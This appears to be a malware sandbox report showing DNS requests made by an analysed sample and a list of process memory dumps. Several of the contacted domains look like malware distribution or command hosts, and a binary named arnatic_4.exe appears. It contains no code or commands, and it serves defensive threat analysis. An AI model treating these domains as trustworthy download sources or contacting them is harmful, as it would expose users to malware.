                                                                ipinfo.io
                                                                dns
                                                                55 B
                                                                71 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ipinfo.io

                                                                DNS Response

                                                                34.117.59.81

                                                              • 8.8.8.8:53
                                                                pki.goog
                                                                dns
                                                                54 B
                                                                70 B
                                                                1
                                                                1

                                                                DNS Request

                                                                pki.goog

                                                                DNS Response

                                                                216.239.32.29

                                                              • 8.8.8.8:53
                                                                sergeevih43.tumblr.com
                                                                dns
                                                                68 B
                                                                100 B
                                                                1
                                                                1

                                                                DNS Request

                                                                sergeevih43.tumblr.com

                                                                DNS Response

                                                                74.114.154.22
                                                                74.114.154.18

                                                              • 8.8.8.8:53
                                                                freeprivacytoolsforyou.xyz
                                                                dns
                                                                72 B
                                                                88 B
                                                                1
                                                                1

                                                                DNS Request

                                                                freeprivacytoolsforyou.xyz

                                                                DNS Response

                                                                45.133.245.228

                                                              • 8.8.8.8:53
                                                                cdn.discordapp.com
                                                                dns
                                                                64 B
                                                                144 B
                                                                1
                                                                1

                                                                DNS Request

                                                                cdn.discordapp.com

                                                                DNS Response

                                                                162.159.129.233
                                                                162.159.135.233
                                                                162.159.133.233
                                                                162.159.130.233
                                                                162.159.134.233

                                                              • 8.8.8.8:53
                                                                jom.diregame.live
                                                                dns
                                                                63 B
                                                                95 B
                                                                1
                                                                1

                                                                DNS Request

                                                                jom.diregame.live

                                                                DNS Response

                                                                172.67.158.82
                                                                104.21.65.45

                                                              • 8.8.8.8:53
                                                                flamkravmaga.com
                                                                dns
                                                                248 B
                                                                248 B
                                                                4
                                                                4

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                              • 8.8.8.8:53
                                                                www.quickfastfuriousloaded.com
                                                                dns
                                                                76 B
                                                                92 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.quickfastfuriousloaded.com

                                                                DNS Response

                                                                89.221.213.3

                                                              • 8.8.8.8:53
                                                                pcfixmy-download-13.xyz
                                                                dns
                                                                69 B
                                                                101 B
                                                                1
                                                                1

                                                                DNS Request

                                                                pcfixmy-download-13.xyz

                                                                DNS Response

                                                                104.21.46.30
                                                                172.67.222.237

                                                              • 8.8.8.8:53
                                                                d.dirdgame.live
                                                                dns
                                                                61 B
                                                                93 B
                                                                1
                                                                1

                                                                DNS Request

                                                                d.dirdgame.live

                                                                DNS Response

                                                                172.67.186.79
                                                                104.21.59.252

                                                              • 8.8.8.8:53
                                                                iphonemoney.xyz
                                                                dns
                                                                61 B
                                                                93 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iphonemoney.xyz

                                                                DNS Response

                                                                104.21.51.159
                                                                172.67.182.129

                                                              • 8.8.8.8:53
                                                                flamkravmaga.com
                                                                dns
                                                                248 B
                                                                248 B
                                                                4
                                                                4

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                                DNS Request

                                                                flamkravmaga.com

                                                              • 8.8.8.8:53
                                                                iw.gamegame.info
                                                                dns
                                                                62 B
                                                                94 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iw.gamegame.info

                                                                DNS Response

                                                                172.67.200.215
                                                                104.21.21.221

                                                              • 8.8.8.8:53
                                                                www.facebook.com
                                                                dns
                                                                arnatic_4.exe
                                                                62 B
                                                                107 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.facebook.com

                                                                DNS Response

                                                                31.13.83.36

                                                              • 8.8.8.8:53
                                                                ol.gamegame.info
                                                                dns
                                                                62 B
                                                                94 B
                                                                1
                                                                1

                                                                DNS Request

                                                                ol.gamegame.info

                                                                DNS Response

                                                                104.21.21.221
                                                                172.67.200.215

                                                              • 8.8.8.8:53
                                                                zedaumalev.xyz
                                                                dns
                                                                60 B
                                                                76 B
                                                                1
                                                                1

                                                                DNS Request

                                                                zedaumalev.xyz

                                                                DNS Response

                                                                77.246.145.4

                                                              • 8.8.8.8:53
                                                                api.ip.sb
                                                                dns
                                                                55 B
                                                                145 B
                                                                1
                                                                1

                                                                DNS Request

                                                                api.ip.sb

                                                                DNS Response

                                                                172.67.75.172
                                                                104.26.13.31
                                                                104.26.12.31

                                                              • 8.8.8.8:53
                                                                uyg5wye.2ihsfa.com
                                                                dns
                                                                64 B
                                                                80 B
                                                                1
                                                                1

                                                                DNS Request

                                                                uyg5wye.2ihsfa.com

                                                                DNS Response

                                                                88.218.92.148

                                                              • 8.8.8.8:53
                                                                www.microsoft.com
                                                                dns
                                                                63 B
                                                                230 B
                                                                1
                                                                1

                                                                DNS Request

                                                                www.microsoft.com

                                                                DNS Response

                                                                2.21.41.70

                                                              • 8.8.8.8:53
                                                                iplis.ru
                                                                dns
                                                                54 B
                                                                70 B
                                                                1
                                                                1

                                                                DNS Request

                                                                iplis.ru

                                                                DNS Response

                                                                88.99.66.31

                                                              • 8.8.8.8:53
                                                                ppcspb.com
                                                                dns
                                                                224 B
                                                                224 B
                                                                4
                                                                4

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                                DNS Request

                                                                ppcspb.com

                                                              • 8.8.8.8:53
                                                                mebbing.com
                                                                dns
                                                                228 B
                                                                228 B
                                                                4
                                                                4

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                                DNS Request

                                                                mebbing.com

                                                              • 8.8.8.8:53
                                                                twcamel.com
                                                                dns
                                                                228 B
                                                                228 B
                                                                4
                                                                4

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                                DNS Request

                                                                twcamel.com

                                                              • 8.8.8.8:53
                                                                howdycash.com
                                                                dns
                                                                236 B
                                                                236 B
                                                                4
                                                                4

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                                DNS Request

                                                                howdycash.com

                                                              • 8.8.8.8:53
                                                                lahuertasonora.com
                                                                dns
                                                                64 B
                                                                224 B
                                                                1
                                                                1

                                                                DNS Request

                                                                lahuertasonora.com

                                                                DNS Response

                                                                79.106.245.34
                                                                175.117.131.126
                                                                211.53.230.69
                                                                115.91.217.231
                                                                152.171.10.3
                                                                91.203.174.38
                                                                179.38.125.180
                                                                190.141.221.178
                                                                211.169.6.249
                                                                37.75.44.24

                                                              • 8.8.8.8:53
                                                                dgos.top
                                                                dns
                                                                54 B
                                                                70 B
                                                                1
                                                                1

                                                                DNS Request

                                                                dgos.top

                                                                DNS Response

                                                                43.132.165.55

                                                              • 8.8.8.8:53
                                                                sndvoices.com
                                                                dns
                                                                59 B
                                                                132 B
                                                                1
                                                                1

                                                                DNS Request

                                                                sndvoices.com

                                                              • 8.8.8.8:53
                                                                api.2ip.ua
                                                                dns
                                                                56 B
                                                                72 B
                                                                1
                                                                1

                                                                DNS Request

                                                                api.2ip.ua

                                                                DNS Response

                                                                77.123.139.190

                                                              • 8.8.8.8:53
                                                                api.ip.sb
                                                                dns
                                                                55 B
                                                                145 B
                                                                1
                                                                1

                                                                DNS Request

                                                                api.ip.sb

                                                                DNS Response

                                                                172.67.75.172
                                                                104.26.12.31
                                                                104.26.13.31

                                                              MITRE ATT&CK Enterprise v6

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • memory/720-199-0x0000000000100000-0x0000000000101000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/720-207-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/720-205-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/720-220-0x0000000004B80000-0x0000000004B81000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/720-206-0x00000000002B0000-0x00000000002EE000-memory.dmp

                                                                Filesize

                                                                248KB

                                                              • memory/756-269-0x00000000003A0000-0x00000000003A1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/856-288-0x00000000002F0000-0x000000000035B000-memory.dmp

                                                                Filesize

                                                                428KB

                                                              • memory/856-289-0x0000000000400000-0x0000000000529000-memory.dmp

                                                                Filesize

                                                                1.2MB

                                                              • memory/868-187-0x0000000000BC0000-0x0000000000C31000-memory.dmp

                                                                Filesize

                                                                452KB

                                                              • memory/868-250-0x0000000001A00000-0x0000000001A71000-memory.dmp

                                                                Filesize

                                                                452KB

                                                              • memory/868-249-0x0000000000A90000-0x0000000000ADC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/912-224-0x0000000000320000-0x0000000000321000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/912-227-0x0000000000600000-0x0000000000601000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/912-226-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                Filesize

                                                                200KB

                                                              • memory/912-225-0x00000000003C0000-0x00000000003C1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/912-191-0x00000000012B0000-0x00000000012B1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1060-164-0x0000000000350000-0x0000000000351000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1060-167-0x000000001B140000-0x000000001B142000-memory.dmp

                                                                Filesize

                                                                8KB

                                                              • memory/1060-166-0x0000000000380000-0x0000000000381000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1060-165-0x0000000000360000-0x000000000037F000-memory.dmp

                                                                Filesize

                                                                124KB

                                                              • memory/1060-162-0x00000000012D0000-0x00000000012D1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1256-219-0x0000000002A50000-0x0000000002A66000-memory.dmp

                                                                Filesize

                                                                88KB

                                                              • memory/1352-188-0x0000000000280000-0x00000000002F1000-memory.dmp

                                                                Filesize

                                                                452KB

                                                              • memory/1352-254-0x0000000000300000-0x000000000031B000-memory.dmp

                                                                Filesize

                                                                108KB

                                                              • memory/1352-184-0x0000000000060000-0x00000000000AC000-memory.dmp

                                                                Filesize

                                                                304KB

                                                              • memory/1352-255-0x00000000030E0000-0x00000000031E6000-memory.dmp

                                                                Filesize

                                                                1.0MB

                                                              • memory/1380-109-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/1380-120-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/1380-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                Filesize

                                                                572KB

                                                              • memory/1380-136-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/1380-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/1380-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                Filesize

                                                                152KB

                                                              • memory/1380-92-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/1380-107-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/1380-131-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                Filesize

                                                                152KB

                                                              • memory/1380-129-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                Filesize

                                                                1.5MB

                                                              • memory/1380-105-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/1380-116-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                Filesize

                                                                100KB

                                                              • memory/1408-173-0x00000000000A0000-0x00000000000A1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1436-284-0x0000000001DA0000-0x0000000001EBB000-memory.dmp

                                                                Filesize

                                                                1.1MB

                                                              • memory/1640-216-0x00000000008F0000-0x00000000008F1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1680-201-0x0000000000390000-0x0000000000391000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1680-208-0x00000000003F0000-0x00000000003F1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1680-204-0x00000000003A0000-0x00000000003B0000-memory.dmp

                                                                Filesize

                                                                64KB

                                                              • memory/1680-197-0x0000000000180000-0x0000000000181000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1800-179-0x0000000000240000-0x00000000002DD000-memory.dmp

                                                                Filesize

                                                                628KB

                                                              • memory/1800-180-0x0000000000400000-0x0000000000949000-memory.dmp

                                                                Filesize

                                                                5.3MB

                                                              • memory/1848-286-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                Filesize

                                                                1.2MB

                                                              • memory/1880-203-0x0000000000400000-0x00000000008F4000-memory.dmp

                                                                Filesize

                                                                5.0MB

                                                              • memory/1880-200-0x00000000001E0000-0x00000000001E9000-memory.dmp

                                                                Filesize

                                                                36KB

                                                              • memory/1940-60-0x0000000075201000-0x0000000075203000-memory.dmp

                                                                Filesize

                                                                8KB

                                                              • memory/1960-217-0x0000000000840000-0x0000000000841000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/1960-209-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/1960-212-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                Filesize

                                                                120KB

                                                              • memory/2044-185-0x00000000003D0000-0x000000000042D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2044-183-0x0000000002160000-0x0000000002261000-memory.dmp

                                                                Filesize

                                                                1.0MB

                                                              • memory/2144-264-0x0000000002D60000-0x0000000003686000-memory.dmp

                                                                Filesize

                                                                9.1MB

                                                              • memory/2144-263-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                Filesize

                                                                9.3MB

                                                              • memory/2200-245-0x0000000005150000-0x0000000005151000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2224-258-0x0000000000310000-0x00000000003AD000-memory.dmp

                                                                Filesize

                                                                628KB

                                                              • memory/2224-259-0x0000000000400000-0x000000000052D000-memory.dmp

                                                                Filesize

                                                                1.2MB

                                                              • memory/2340-278-0x0000000000220000-0x000000000024F000-memory.dmp

                                                                Filesize

                                                                188KB

                                                              • memory/2340-282-0x00000000049D3000-0x00000000049D4000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2340-281-0x00000000049D2000-0x00000000049D3000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2340-283-0x00000000049D4000-0x00000000049D6000-memory.dmp

                                                                Filesize

                                                                8KB

                                                              • memory/2340-280-0x00000000049D1000-0x00000000049D2000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2340-279-0x0000000000400000-0x00000000004E9000-memory.dmp

                                                                Filesize

                                                                932KB

                                                              • memory/2348-262-0x0000000000400000-0x0000000000950000-memory.dmp

                                                                Filesize

                                                                5.3MB

                                                              • memory/2348-261-0x0000000002320000-0x00000000023BD000-memory.dmp

                                                                Filesize

                                                                628KB

                                                              • memory/2468-248-0x0000000000210000-0x000000000026D000-memory.dmp

                                                                Filesize

                                                                372KB

                                                              • memory/2468-247-0x0000000002090000-0x0000000002191000-memory.dmp

                                                                Filesize

                                                                1.0MB

                                                              • memory/2616-256-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/2704-276-0x0000000000A20000-0x0000000000B4A000-memory.dmp

                                                                Filesize

                                                                1.2MB

                                                              We care about your privacy.

                                                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.